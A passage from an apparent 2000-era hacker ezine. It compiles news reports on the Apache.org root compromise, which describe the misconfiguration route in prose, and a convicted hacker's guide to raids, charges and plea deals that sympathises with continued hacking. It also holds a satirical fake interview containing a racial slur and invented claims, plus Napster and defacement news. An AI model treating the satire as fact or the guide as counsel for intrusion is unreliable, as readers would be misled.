TFN, the DDOS-distributed attack tool recently brought to light in the
media by denial-of-service attacks on major websites," the ezine
wrote.
A mirror of the defaced site can be found on the Attrition.org mirror site
and specific details of the break-in can be found on Apache's site.
"They came right out and admitted what had happened and said they were at
fault," said OpMan, a New York-based computer systems enthusiast, who
noted that "you won't see Microsoft taking the blame for the ILOVEYOU
debacle."
"This was a classy hack," Cruciphux said. "It ended almost like a fairy
tale. Although tracks were covered and logs cleared, it was decided to
alert the apache.org people about the condition and a meeting between the
intruders and Apache ensued. Not all defacings go this way, so
kiddies remember: It is still very illegal and risky to do this. Be
warned."
The Register;
http://www.theregister.co.uk/000506-000002.html
Posted 06/05/2000 7:47pm by Thomas C. Greene in Washington
Apache.org owned by white hats
Friendly strangers briefly took over the Apache Software Foundation server by
exploiting a series of common configuration errors, and then announced their
presence by inserting an advertisement for Microsoft at the bottom of the home page.
The open-source Apache is the most popular HTTP page server software currently in
use.
The intruders gained root access to Apache.org and could have done considerable
damage, including replacing the Apache software offered for download with versions
containing a Trojan which would have given them access to servers running all
subsequent copies downloaded from the Apache.org Web site.
In spite of the damage they could have done, they confined themselves to verifying
their exploits, fixing one hole in Apache.org's server configuration, and leaving behind
a harmless reminder. They also posted the full details of their exploits.
The intruders originally gained easy access via FTP, discovered a plethora of
world-writable directories (tsk, tsk), and installed a simple BIND shell which they could
execute remotely via Telnet and from which they learned what services were running
and the contents of most directories.
Apache.org was running the BugZilla bug-tracking software, which requires a Mysql
account. They found Mysql available locally and running as user root, though the
BugZilla documentation warns against running Mysql as root.
"We hacked www.apache.org because there are a lot of servers running apache
software and if www.apache.org got compromised, somebody could backdoor the
apache server source [code] and end up having lots of owned boxes," the intruders
said.
"We just couldn't allow this to happen, we secured the main ftproot==wwwroot thing.
While having owned root we just couldn't stand the urge to put that small logo on it."
The intruders, who go by the aliases {} and Hardbeat, showed a bit of purist pride.
"We didn't wanted [sic] to use any buffer overflow or some lame exploit; [our] goal was
to reach root with only configuration faults," they explained.
Apache.org took the exploit in the spirit in which it was meant. "They seemed friendly.
It would have been nice if they hadn't put the damned Microsoft logo up, but I guess
they had to do something to get attention," Apache Software Foundation director
Rasmus Lerdorf said in an interview with CNET.
"We can only blame ourselves. It's quite embarrassing, but it's a good little heads-up,"
Lerdorf reportedly said.
This has to qualify him as the kewlest corporate suit in the known universe. ®
-=-
C|Net;
http://news.cnet.com/news/0-1003-200-1821155.html?tag=st.ne.1002.bgif.ni
Apache site defaced in "embarrassing" hacker attack
By Stephen Shankland
Staff Writer, CNET News.com
May 5, 2000, 12:45 p.m. PT
Intruders defaced the main Web site of the Apache Web server project this
week with a fake ad for a rival software package from Microsoft.
A group of intruders broke into the server by exploiting a series of
weaknesses, said Rasmus Lerdorf, a member of the Apache Software Foundation
board of directors and a programmer at Linuxcare. The intruders limited
themselves to inserting the Microsoft advertisement at the bottom of the
page, though they could have done much worse damage because they had gained
complete control over the computer, he said.
Because of the comparatively mild damage and the fact that the intruders
told Apache how their attack worked, Apache termed them "white
hats"--helpful hackers, not the more malicious "black hat" category.
"They seemed friendly," Lerdorf said. "It would have been nice if they
hadn't put the damned Microsoft logo up, but I guess they had to do
something to get attention."
The burgeoning number of computers on the Internet is vastly increasing the
opportunity for attackers looking for sites to break into. At the same
time, those computers also are storing more important information, such as
credit card numbers or corporate records.
Apache is software used on a server to deliver Web pages to Internet
browsers. It's the most commonly used Web server software, running on 60
percent of Web servers, according to a study by Netcraft. Microsoft's
Internet Information Server is in second place with 21 percent.
Apache, along with Linux, is among the best-known "open-source" programming
projects, in which anyone may see, modify and redistribute the software's
original programming instructions. Open-source projects typically are
developed by a core group of volunteers, but corporations are increasingly
involved as well. IBM and Sun Microsystems in particular have boosted
Apache.
The basic problem at Apache was that too many people could install whatever
software they wanted on the server, leading to vulnerabilities that stemmed
from the different pieces of software interacting, Lerdorf said. "We just
had too many people installing too many services on the box without
coordinating with each other," Lerdorf said.
Apache now has shut down two vulnerabilities that led to the attack and has
reduced the number of people who have control privileges, he said. In the
longer term, Apache will be splitting jobs across several servers, a
configuration that allows better security, Lerdorf said.
In a note posted to the Bugtraq security mailing list today, the intruders
described how they broke into the server.
Lerdorf said the first stage was that members of the public could store
software on the server after sending it with FTP software. The attackers
used this feature to save a small program on the machine that later could
be used to tell them what files were stored elsewhere on the system.
The intruders then discovered the server had the Bugzilla bug-tracking
software produced by Mozilla, the organization building America Online's
Netscape Web browser. A weakness in Bugzilla allowed the attackers to gain
complete control over the system, Lerdorf said.
Apache shut down Bugzilla completely and will either fix it or replace it
with other software, he said.
Lerdorf put a good face on the defacement. "We can only blame ourselves,"
Lerdorf said. "It's quite embarrassing, but it's a good little heads-up."
SlashDot;
Posted by jimjag on Thursday May 04, @11:23AM
from the strong-as-the-weakest-link dept.
Yesterday, due to system-level misconfigurations, www.apache.org was
defaced after a root-level breakin. Those responsible for finding the
holes and the ASF have been in cordial contact, and the holes have been
plugged. In the process of doing that, FTP and other services on
www.apache.org have been stopped. A mirror of the defaced site can be
found on the Attrition.org mirror site. Brian Behlendorf sent the
following to various Apache mailing lists:
Hi. We have been made aware (thanks to a very humorous banner ad for
Microsoft Back Office on the front of www.apache.org!) that our particular
configuration on www.apache.org of ftpd and bugzilla opened a security
hole that allowed someone from the outside to get a shell account, and
then get root. We have been in contact with those who found the hole, and
have closed up the misconfigurations that allowed this.
It is important to note that this is *not* a hole in the Apache web server
or related software products. I would encourage double-checking the PGP
signatures of Apache releases for the immediate future.
However, I do not believe we are out of the woods yet. Bugzilla has not
been thoroughly audited, and while I am not worried about ftpd, simply
having another deamon that can write files to the web server whose purpose
has been completely superceded by others suggests that taking it down for
good is the right idea.
So I am taking down FTP - something that should have been done long ago.
If there are FTP links on any of our pages (or on places like freshmeat)
they should be change to HTTP. There are enough high-quality text-mode
HTTP clients that there is no point to having it up, save for mirroring,
and we allow rsync and cvsup for that. I will be contacting the mirror
site admins list to communicate this.
Also, I have taken down all installations of bugzilla on apache.org until
it can be audited. I will be performing a first pass tonight over it, but
anyone else familiar with perl and willing to deal with rather ugly code
is welcome to do so as well. I will set it back up once I'm comfortable
there's been at least one reasonable pass over the whole codebase and any
obvious holes have been plugged. This is only life-support though; I
really don't think we should be using bugzilla once a suitable replacement
is found.
Finally, I think it can be said that this compromise was mostly due to a
lack of discipline on the part of those who had root and set up services
without considering the ramifications of the way they were installed. I
don't want to point fingers, since I'm probably at least as to blame as
others, but I do feel that the policy of giving root access to a larger
number of people than usual was probably a mistake. Along those lines,
I've changed the root password and removed everyone from group wheel but
myself - sorry to be fascist about this but I kinda feel like at the end
of the day it's my responsibility. We'll come up with a strategy soon
about granting sudo access to particular people for particular binaries so
that I don't become a bottleneck again.
The details will soon be posted to bugtraq. Thanks.
LinuxNews.com
Pow-Wow With Apache's Hackers
By Michelle Head
Can you be scalped nicely? Apache seems to think being red in the face
beats being red in the accounting department after an embarrassing
encounter with some clever and well-meaning hackers.
With the IT world still bobbing confusedly in the wake of the Microsoft
Outlook love bug, the Open Source Internet Servicer, which currently
runs over 60% of the Web sites on the Internet, was targeted by hackers
Friday. The intruders, who declined to damage or disrupt the site,
instead marked their trail with a modified Microsoft logo.
Shortly afterwards, the hackers described their harmless heads-up in
full detail on the Internet in a step-by-step tutorial, identifying
themselves as Hardbeat and {}. The site describes how configuration
errors allowed the two access to Apache--and how, instead of damaging
the site, they simply posted an amusing warning and secured the site
from other, less well-meaning prowlers on their way out.
Asked if this hack was meant to protect a major Open Source project,
Hardbeat responded, "We did this hack because we could. The possible
risks mentioned in the paper (Trojanning Apache source) were really an
afterthought. We did this because Apache.org is a high-profile site, and
these configuration problems are common. Therefore, defacing Apache.org
would be a great way to draw attention to these errors."
{} described his background. "I am a coder, everything I write (like a
Linux kernel security patch named auditfile) is Open Source," {}
volunteered. "I work at a local monkey zoo and at a Cable ISP." {}
intends to start formal training in computers next year.
Hardbeat's background in Open Source is less extensive. "I have written
one Open Source tool (http://www.dataloss.net/midentd). It's [available
under the GNU (GNU's Not UNIX) General Public License (GPL)] but the
next version will not be. It is also no longer maintained, because I am
too busy. In daily life, I go to University (I am in my first year of
Computer Science) and I have a job as a systems administrator/developer
at a big hosting company in The Netherlands. I have no professional
training," Hardbeat explained. "It's all experience."
Hardbeat commented on the hackers' choice of a Microsoft logo for their
marker. "Let's start by stating that that had no political meaning--we
were looking for a subtle way to show we had that kind of access,
without damaging anything or hindering people in their business at
www.apache.org," he wrote.
"We also figured that would draw a teensy little bit of extra
attention," he continued, "and you asking this question shows that it
does. :) Also note that this was not an official M$ logo," he added. "A
friend of ours who works as a graphic designer did this thing for us."
On whether Apache is their first (or last) mission, the happy hackers
have no comment. "If we have anything to share we will, but privacy is a
high good," Hardbeat explained.
Hardbeat and {} hoped Apache would have "the only correct reaction to
such a hack--to talk to the people who did it, and not sue them when
they had no bad intentions." The pair hoped to educate Apache rather
than upset them.
"Talk to them, ask them what they did and especially how they did it,"
Hardbeat advised. "That way they will stay friendly to you and help you
fix the problems in a quick and reliable way."
"Apache reacted above these hopes, being friendly and responsive,
complimenting us `you guys are clever!', `Good work, guys'" Hardbeat
reported.
Apparently Apache's director was grateful for the warning. "They seemed
friendly. It would have been nice if they hadn't put the damned
Microsoft logo up, but I guess they had to do something to get
attention," Apache Software Foundation director Rasmus Lerdorf said in
an interview with CNET. "We can only blame ourselves.
"It's quite embarrassing, but it's a good little heads-up,"
About the Author:
Michelle Head is an experienced author who decided to plunge into the
world of Linux journalism. Michelle is a new Linux enthusiast and is
excited about the Linux community. She welcomes feedback on her articles
and would love to hear ideas for future articles. She can be reached at
Michellh@LinuxMall.com.
@HWA
32.0 [IND] The Goat Files: mindphasr talks more about his bust.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(selected files from www.goat-security.org)
http://www.goat-advisory.org/texts/goat-gH-busted.txt
"Everything a hacker needs to know about getting busted"
part 2 by mindphasr (gH)
***note: Although g0at security mocks gH quite a bit, we still have some what
good relations with the busted mindphasr. I asked mindphasr to write something
like this for goat-advisory.org, instead it is being released under gH, we do
however have exclusive distro rights to this, thus the reason why it is up here....
..::gH Release 040900:..
..::mindphasr@attrition.org:..
* Converted from a scratch pad into a .txt file by John Welder a.k.a. "Ansle"
"EVERYTHING A HACKER NEEDS TO KNOW TO ABOUT GETTING BUSTED PART 2"
:PREFACE:
A. INTRODUCTION
B. THE RAID
C. CHARGES
D. GETTING A DEFENSE
E. INDICTMENT
F. PLEA AGREEMENTS
G. HEADING TO COURT
H. YOUR FUTURE
I. THE END
:PREFACE:
This file is being written for the sole purpose to be informative. I take no
responsibility for anything that is done with this file in mind. This file may be freely
copied to a bulletin board systems, text archives or print material. All I ask is proper
credits are given to the author(s). - mindphasr / April 5th 2000
A. INTRODUCTION
Now days, after very popular movies such as "Hackers" and "The Matrix" the hacker world has
much been glamorized as something most people will see as something very
interesting. However, what is not shown is the real consequences of what could happen in
the end. There have been so-called hacker groups popping up all over, many of which last
about as long as a 10 dollar bill laying on the road. In the past 5 years I have gone
through many things in the scene. I have seen people trusted by the community turn into
FBI informants, I have seen looked up to people in the scene turn into FBI informants, I
have also seen best friends turn their backs. This is all part of the so-called hacker
world. Many individuals these days will do anything they can to gain respect in the scene,
however many are unaware what may come of this. I have been through one of the most highly
publicized hacker incidents in the last decade, and unfortunately have also gone through
the court battles. The battles I hope this document will help most get through. However,
this document will be focused primarily on the legal issues involved and what to and to not
do. I write this with much respect for Agent Steal's 1997 file "Everything a hacker needs
to know about getting busted". I am going to go over some things that have not been covered
in his file. It is an excellent file, read it, read it many times. You may obtain his
text file at http://www.attrition.org/~modify/texts/scene/everything.busted.html . Enjoy.
B. THE RAID
This is probably when it will hit home for most of you. You may suddenly realize what you
have done is not so harmless. You will most likely be awakened from a sleep between
6am-9am. You will get to hear the infamous FBI knock. They knock louder than anyone you
have ever heard, you will know its them. If you do not open the door within a minute or so
they will not hesitate to open the door themselves. If you are in an apartment complex,
they will have a key. If you are at your home, they will have a bigger key that will knock
your door down. It will usually be a few FBI agents and then local law enforcement
'assisting'. They don't care if you're a 9 year old or a 40 year old. They do it all
the same. When they come in they will find you and grab you and drag you somewhere safe
where they can search you. In most cases that will be outside your apartment or
house. They will have their guns drawn, so doing something stupid at this point would not
be bright at all. They will then handcuff you and bring you back inside and set you down
on a couch or a nice chair. Get comfortable you may be sitting there awhile. An agent
will then proceed to tell you they are going to search you place, make sure you ask for the
search warrant. A key to look for here is who the warrant is written out to. In most cases
your local police will NOT have a warrant issued to them, do not let them go through
your stuff. Leave it to the FBI. There is actually a good reason for this, the FBI will
not and cannot issue citations for drugs, underage drinking, etc. If the police see it
they will write you up. You don't need that. They like to get sneaky and try to get you to
agree and make you think they have one. They will NOT always have one. After you overlook
the warrant, they will then proceed to tear your place apart. They will search everything,
I mean everything. In fire alarms, behind posters, in attic, under rugs, in refrigerator,
in tape decks, in your garbage. While the agents are executing the search one designated
agent will be there to try and get you to talk to them. You have heard it before and you
will hear it again many times: DO NOT SPEAK WITH ANY OF THEM, KEEP YOUR MOUTH SHUT! NOTHING
YOU SAY WILL DO YOU ANY GOOD. When you decide not to speak with them chances are they will
get a little testy. That's their problem. I suggest you do not say a single world while
they are there other than "May I see the warrant?" You don't have to; it's your right to
remain silent. In most cases they will not arrest you. They will leave. They will also
try and say bye to you and get you to call them back. This is a controversial situation,
some people say call them back and try to cooperate. However, in my experiences it gets
you nowhere. So don't bother. Before they leave, make sure you get a copy of the search
warrant and the "Search & Seizure" form. That form will allow you to get your things
back. If it is not written down on there, you will not receive them back. Check it over
before they leave.
C. CHARGES
In most cases after the raid you will not hear from the FBI for quite some time. Some
cases, never again. They tend to take their time. Charges will follow. They will be back
to execute yet another search warrant, however most cases this will have to be a voluntary
execution. They will most likely be back with a list of charges being brought
forward. They will then ask you if they can execute a search warrant. If you say no they
will say a cocky line such as "Oh, that doesn't matter we can get one within 1 hour, and we
will let the judge know you're not cooperating." This is the point where you may want to
cooperate somewhat. They can keep you in custody. They will arrest you and bring you in
front of the nearest Magistrate (which is a fancy term of a off dutiy judge). He will then
decide whether you should be kept in custody or not. In my case, I was brought downtown to
the courthouse and put in a real nice office and put on a teleconference with a Magistrate
and he discussed with the FBI agents if I should be kept in custody or not, and if not what
my conditions of release should be. This is where the agents may say you are not
cooperating. I was release on a signature bond and restricted from coming within 10 feet
of a computer.
D. GETTING A DEFENSE
Depending on your case, you are going to have to decide what kind of lawyer to get. In
federal cases there really is no such thing as "Public Defender". What they do is put
together a bunch of lawyers who would like to work federal cases to extend their
resumes. They then pick from a "hat" to come up with a lawyer to represent you. In my
case, I was hooked up with a very very nice lawyer. So therefore I did not have to go out
and spend my life savings on legal fees. However, you could get the so-called shaft and
get a sucky PD wannabe. In this case you are going to want to go searching for a lawyer
who has experience in this sort of law. Those kinds are becoming easier and easier to find
these days. Depending on your wallet you are going to want to find one you can afford and
yet still be able to eat afterwards.
E. INDICTMENT
This is sort of a downtime. You must wait for the Grand Jury to come back with an
indictment on your charges. This will happen 99% of the time. This is when the charges
are official. Most indictments will have extra charges tacked on that the government
themselves know they cannot prove. These will be used for "Plea Bargain" situations. Such
as "You plea to count 1 and 3, we will drop 2 and 4" You get the idea.
F. EVIDENCE
Be prepared, you are going to be surprised at what the government has on you, and your
'conspirators.' You are going to want to file a "Motion for Discovery" which will require
the government to hand over all their "discovery" materials. This will include photocopies
of paperwork obtained at their raids, stuff from others. Statements made by others against
you. And of course hardware. You get the point. The government will go over this very
closely and pick apart everything. They like to link everything together, even if its not
called for. They will do it. They will most likely go through your drives and link
together things to make you look like a monster. They will also pin you down as part of a
conspiracy if you are involved with more than one person, such as in my case. If you are
lucky they won't file addition conspiracy charges.
G. HEADING TO COURT
Once the indictment is presented, and then you have to make some very important
decisions. These could affect your future. First off, are you clearly guilty of the items
and can they be proven? If so, common sense tells you not to spend your life fortune to
hire a lawyer who will lie for you. In most computer cases there is substantial evidence
that is rather blatant. Such as phone logs that will shoe exactly what you did. If you
believe you are being targeted for things that cannot be proven. Go ahead fight it. In
most cases the government will try to tack on a few extra charges, which are rather
irrelevant and they know cannot be proven. However, these are used for plea bargain
situations. I will discuss that a bit more in the next section. So far, in this file I
have taken a much better look at Federal crimes. Since unfortunately that is all I have
personal experience in. In federal cases all court dates will be one of the Federal
Courthouses. You most likely will have to drive a ways to get to it. Each state has at
least two federal courthouses. This will vary depending on where you are.
F. PLEA AGREEMENTS
They will be offered. Sometimes they will be bad, sometimes they will be good. Do NOT
take the first one presented to you. This is usually an agreement, which lets the
government know how guilty you really think you are. They will offer more than one. If
you have a good lawyer he will be in contact with the US Attorney and will try to work
something more practical out. It happens in most cases. This is a very important thing to
think about. If do not accept a plea agreement, then you can risk your case in
court. However if you loose, you may be wishing you had accepted an agreement. You can't
go back and accept it later. Think about this, think about this long and hard. If you
decide to accept one, make sure you read the WHOLE agreement over, several times. They
like to hide things in there. Be careful of what you sign.
G. SENTENCING
Let's skip ahead here. Lets say you are found guilty of something. Then the next phase is
sentencing. This can be a wreck to most people and their families. Sentencings in federal
cases go by the United States Sentencing Guidelines aka U.S.S.G. It is a point scale. They
will take your criminal history, your cooperation, the damage caused, i.e. and add points
up and minus points off. They will come up with a number. This number will decide the
sentencing range. In my case there was quite a problem with this. My lawyers added up a
number of 8. The government had a number of 9. Because of the disagreement on damage
caused. The 1-point difference was about 5 months different in imprisonment. The judge
has the discression to not use the point system. However, my case was sort of a precedent
being set. If the point were 8, I would have gotten 0-6 months. However, the minimum
sentence in the code for the sub Section 1030 crime was 6 months. So that caused a
problem. Could the judge go less than 6? He clearly could according to the U.S.S.G. but
not according to the law. He elected to rule out the points, and go with the book. I was
given 6 months. The very minimum. Even though the government was looking for 28 months
:) The judge may also decide where to put you. In my case I was sentenced to a Federal
Half-Way house. I was lucky, there was room and I did not have to spend anytime in a
Federal Prison. I have not been to the halfway house yet however, so I will leave
information on that to be put in a revision down the road.
H. YOUR FUTURE
Now, after your sting in the Federal holding center. You will most likely be not allowed
to speak with any of your ex-friends. Not use a computer. Let all employers know of your
past. Be on probation. Not be allowed to profit from your story. All these things come
as part of your sentence. You will have to report to a probation office, be drug
tested. Have to contact her of any police contacts, if you are leaving your district. It
will not be fun. I got the maximum probation, which is 3 years for my case. I will deal
with it. If I can I'm sure you can :)
I. THE END
Well, I hope this was a help to you. This along with Agent Steals text I am sure you can
get a very good understanding of the whole situation. I am not here to tell what to and
not to do. Remember, I have gone through it. I know how it is. If you are going to do
these activities please remember these things. As long as you talk to the right people
(Stay away from John Vransevich @ AntiOnline, Carolyn Meinel @ HappyHacker) and be very
careful when you do things. Slipping up once, may make these text files reality.
I admire and respect the following people and organizations very much for their friendship
and help over the past 5 years, you have been a big part of my life whether you know it or
not:
Organizations: Global Hell(gH), cha0s inc., Cult of the Dead Cow, h4gis, l0pht, Attrition,
Hacker News Network, Pure Security Networks, Help Net Security, 100% Bikkel(RIP), Defcon,
Rootfest, 2600-gb2600, FinalDream inc.,
Individuals: MostHateD, altomo, Zyklon, Taylor, shekk, Debris, ech0, Jericho, McIntyre,
flesh, obsolete, LoopHole, aeonflux, SoulBlaze, Rewn, Kuruption, Cryzydopey, diesl0w,
socked, spacerog, Agent Steal, Kevin Mitnick, Ted Bridis, Brock Meeks.
@HWA
33.0 [IND] The Goat Files: "Hackers unite - a goat security expose"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(selected files from www.goat-security.org)
04/24/00
///////////////////////////////////////////
GGGGGG OOOOOOO AAAAAAAA TTTTTTTTTT
G O O A A TT
G GGG O O AAAAAAAA TT
G G O O A A TT
GGGGGG OOOOOOO A A TT
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
[g0at] http://www.goat-advisory.org [g0at]
-=g0at media productions=-
((Hackers unite))-((A goat security expose))
In a most terrifying move by the biggest names in the underground community,
representatives of Global Hell (gH), the Shot Down Crew (sDc) and
the Brotherhood of Warez (BoW) have announced a merger making them the biggest and
more powerful hacker group the Eris Free net's IRC network has ever seen.
g0at security [http://www.goat-advisory.org] has taken upon itself the mission of
getting to the bottom of this alarming event and discovering the reasoning behind it.
Recently, a member of g0at security visited Global Hell leader, Patrick Gregory
(aka Mosthated) in his new home, a United States federal penitentiary where he is
serving 5 years. Upon entering the prison library, where we were to interview Gregory,
we found him sitting on the lap of another inmate tapping away at the keyboard of the
prison computer. When asked what he was working on, Gregory replied saying that he had
recently reformatted the computer and installed the latest version of Linux Mandrake as
opposed to Microsoft Windows 95 since microsoft products are lame. He then went on to
tell us that to occupy time in prison, he has downloaded Microsoft Visual Basic 6 and
has been running it with the latest version of Wine in the KDE environment. A full interview
follows.
GS - g0at security
MH - Patrick Gregory
GS: Can you confirm a merger between Global Hell and other well known underground groups?
MH: Yes, Global Hell is merging with two other group.
GS: What groups are these?
MH: The Shot Down Crew and the Brotherhood of Warez.
GS: What is the reasoning behind this merger?
MH: Well as you may know, since the FBI investigation commenced in the Summer of 1999,
gH has slowly been dying out. Many of our members have taken off in fear of being
raided, some were arrested, and gH's two leaders are now serving time. We have lost
our stronghold on the internet and we must regain this in order to show the public
stability in our organization.
GS: Why is stability in Global Hell required for the general public to see?
MH: The gH ran security site (http://www.pure-security.net) has been growing
gradually over the past half year and we need to raise some capital in
order to increase our expansion. Pure Security Networks, is announcing that
it has filed to go public (IPO) in May of 2000.
GS: An IPO? Please expand on this...
MH: Well, May 23 2000, Pure Security Networks under the symbol of PSN, will be trading
on the Nikkei 225. Common shares will start a $0.32, no preffered shares are
being offered.
GS: During this expansion of Pure Security Networks, what new services will be offered?
MH: Well we have negotiated a contract with the government of Zaire to offer internet
connectivity to local schools. Also we plan on beginning mutual fund and retirement
consultations along with helping script kiddies create investment portfolios.
g0at security then went on to get the Smack Down Crew's side of the story. g0at security
found members of the group on the James Joyce appreciation BBS located in Dublin, Ireland.
When asked about the merger and various questions related to the IPO, sDc representatives
respond with the same uniform answer, "Whachoo talkin bout foo". They then went on ranting
about how they own goats. They ended the interview with a very befuddled quote. "Dem goats
better rememba somethin foo, mess with the best, die like the rest". We were then expelled
and banished for life from using the James Joyce appreciation BBS.
Finally, g0at security went on to get the story from the Brotherhood of Warez. g0at security
met with a member of the group, sw_r on a popular IRC channel, #solace on efnet which
appeared to have been taken over by some goats. When asked about the reasoning behind
the merger and IPO, he went on to quote us this:
"Back in the day, I was a member of the MOST elite hacker group ever, the Masters of Deception.
MOD was so much more elite then LOD. FUCK the LOD, they should all rot in hell. God I hate
Eric Bloodaxe, that neegro is going to get it. Friggin hick, show them texas boys what I'm made
of. Anyways, a book was written about the MOD and how we kicked the LOD's asses! Those stupid
authors (Michele Slatalla and Joshua Quittner) didn't include me in their friggin book! They
should DIE! I own them. I own them all. So with this IPO, I hope to buy out the Harperperennial
Library and ruin those damned authors carriers. I'll show them who the elite one is. Not
that twirp PhiberOptik, I own his ass. I'll school him in DNS anyday".
g0at representatives then proceeded to back away very slowly until there was enough distance
for us to run away, fast, very fast.
Call your brokers folks, this hot new IPO is expected to rise, fast, very fast. In final notes,
this new group being dubed, the Planet Hackers Club should not be messed with. Already they have
waged war with other groups such as DevilSoul and the Pakistan Hackers club. Routers everywhere
are in major trouble. We hoped this expose was helpful and informative and all further questions
should be direct to members of this new merged group.
@HWA
34.0 [MM] Napster boots 317,377 users
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"So, what the heck is Napster?
Napster is a completely new way of thinking about music online.
Imagine...an application that takes the hassle out of searching for MP3s.
No more broken links, no more slow downloads, and no more busy, disorganized
FTP sites. With Napster, you can locate and download your favorite music in
MP3 format from one convenient, easy-to-use interface."
- From the Napster site.
ZDNet news;
http://www.zdnet.com/zdnn/stories/news/0,4586,2566773,00.html
Napster boots 317,377 users
Earlier this month, Metallica presented Napster with a list of users who it
claimed had violated the band's copyrights.
By Margaret Kane, ZDNet News
UPDATED May 10, 2000 9:58 AM PT
Online music vendor Napster Inc. said it has removed 317,377 users who have
been accused of violating copyrights off its Web site.
The action was taken in response to a request from heavy metal band
Metallica, which filed suit against Napster in April. Last week Metallica
presented Napster with a list of users who it claimed had violated the
band's copyrights.
The band provided Napster with a list of user names; file names of
allegedly infringed music for each user; and the time, date and IP address
of the Napster server to which the user was connected. The list did not
contain IP addresses of the users.
Rapper Dr. Dre announced Wednesday he will submit names to Napster for
removal from the system, according to attorney Howard King, who also
represents Metallica.
Napster's technology allows users to copy digital music files from one
another.
"We intend to fully comply with the DMCA (Digital Millennium Copyright
Act) and our policies," reads a statement posted on the Napster site. "We
will take down all users Metallica has alleged, under penalty of perjury,
to be infringing."
The company said users who feel they have been banned by mistake will be
given the opportunity to submit a "counter notification" form.
Metallica obtained the users' IDs by monitoring the service over a two-day
period. Napster said it did not give Metallica personal information, such
as names and addresses, about the users who have been kicked off.
Metallica's attorney said last month that the band submitted the names at
Napster's request.
Dr. Dre also filed suit against Napster last month.
The ban will only extend to users who shared versions of commercially
released songs and would not apply to "bootleg" recordings made at
concerts.
Marilynn Wheeler, ZDNet News, contributed to this report.
Napster's Press Release:
~~~~~~~~~~~~~~~~~~~~~~~
http://www.napster.com/metallica-notice.html
Information About Metallica's Request To Disable Napster Users
On Wednesday, May 3, 2000, Napster received a delivery from the band
Metallica of 13 boxes of paper notifying us of Napster users alleged to be
infringing Metallica and its related entities' copyrights. On Thursday
afternoon, May 4, Metallica sent computerized lists of 317,377 Napster
user names alleged to be infringing Metallica's copyrights. Metallica has
requested that, in compliance with the notice and takedown policies
outlined in the Digital Millennium Copyright Act ("DMCA"), Napster act
expeditiously to disable all of these users.
We intend to fully comply with the DMCA and our policies. We will take
down all users Metallica has alleged, under penalty of perjury, to be
infringing.
Conversely, the DMCA affords certain protections to users. Namely, a user
who is banned from the service deserves the opportunity for reinstatement
in the event that there has been a genuine mistake or misidentification of
the materials made available by that user. Users who feel they have been
banned as a result of a mistake or misidentification of content may submit
a "counter notification" form.
The Napster software will direct all users barred as a result of
Metallica's allegations to an infringement notification page. That page
explains the notice that Metallica has given us, explains who Metallica
has stated to us it intends to block, and gives the user an opportunity to
submit a counter notification if the user has been misidentified. If the
user has been misidentified, and requests to be reinstated by submitting a
counter notification under penalty of perjury, then, unless Metallica
chooses to pursue legal action against that user within 10 working days of
being notified of that user's counter notification, the user is entitled
to be reinstated.
We at Napster respect the privacy rights of our users. We currently keep
our users' personal information, including personal names, e-mail
addresses, street address, or other data separate and distinct from users'
Internet activities. That information was not disclosed to Metallica, or
to its related business entities Creeping Death Music, or E/M ventures, or
any other entity. Napster collects information at registration solely for
the purpose of better understanding who its audience is. Of course, if you
subsequently send Napster e-mails, other correspondence, or a "counter
notification" that identifies both your user name and your real name or
e-mail address, that information does become recorded in combination.
Because of the methods employed by Metallica in assembling its list of
usernames, it is possible that users have been mistakenly implicated as
infringing the copyrights of songs and recordings originally included on
commercially released Metallica albums. It is also possible that Metallica
has correctly identified many users. Napster will reinstate those users
who dispute Metallica's allegation of infringement via a sworn "counter
notification" stating that they have not shared the materials to which
Metallica objects, and who, after submitting the counter notification, are
not made the subject of legal action by Metallica within ten (10) working
days after Metallica is notified of that person's identity.
Frequently Asked Questions About Metallica's Request (FAQs)
Q: What information has Napster received from Metallica?
A: Metallica delivered a computerized list of 317,377 distinct usernames
to be banned from Napster. The list contained usernames, filenames of
allegedly infringing music for each user, time, date, and the IP address
of the Napster server to which the user was connected. That information
did not contain the user's IP address or personal information. Metallica
has stated that it intends to limit the scope of its notification to
commercially released Metallica albums, making "no claim of infringement
with respect to recordings of songs made by fans at Metallica live
concerts."
Q: How has Napster responded to this request?
A: As a DMCA compliant service, Napster feels strongly that it is
important to expeditiously remove users alleged with copyright
infringement. Napster has blocked all users identified by Metallica
as allegedly infringing, based on Metallica's sworn allegations against
these usernames. If, but only if, these users feel that they have been
identified in error, they have recourse through our counter notification
policy.
Q: Has Metallica requested any personal information related to Napster's
users?
A: No, and no such information has been provided to them.
Q: What does Napster do with personal information provided at
registration?
A: Napster archives personal information, such as user addresses,
e-mail addresses, and the like, to use as general demographic
information for audience measurement purposes. We do not currently
associate a user's personal information with their Napster username.
Copyright 1999-2000 Napster, Inc. All rights reserved.
@HWA
35.0 [MM] ytcracker busted for web defacement
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.gazette.com/daily/top3.html
Teen accused of raiding city Web site
By Danielle Nieves/The Gazette
Edited by Mike Braham; headline by Gary Houy
A 17-year-old Colorado Springs boy
was charged in juvenile court
Tuesday with one count each of
computer crime and criminal mischief
after he broke into the city's Web
site in October and replaced it with
the message, "i love this city
ytcracker 9d9 palmer high."
The two felony charges carry a maximum penalty of two
years of juvenile detention.
The boy, known online as "ytcracker," said he is a
benevolent hacker who was trying to alert officials of
potential security glitches.
After discovering he had tapped into the city's Web site
in October, Colorado Springs police began an
investigation and said he had tampered with at least 40
other Web sites, including Airspace USA, Altamira
International Bank, Nissan, Honda, the U.S. Geological
Survey Monitoring Station and the Texas Department of
Public Safety.
In December, not knowing of the investigation,
"ytcracker" contacted the National Aeronautics and
Space Administration and told them he had meddled
with their Web site.
The agency teamed with Springs police, the Defense
Criminal Investigative Service, the NASA computer crime
division and the Texas Department of Public Safety to
gather information that led to the felony charges.
"I never had any intentions of doing damage," he said.
"At first it was funny, and then I wanted to alert people
to the security vulnerabilities in everyday software - and
the fact that no one is immune."
The boy said what began as a joke last summer turned
into a precarious game between administrators of online
Web sites and his own expertise. He said he started
hacking into local business sites, then graduated into
more complicated systems, like the Bureau of Land
Management National Training Center.
The Web sites he affected were typically dismantled for
only a matter of hours, he said. Police said he caused
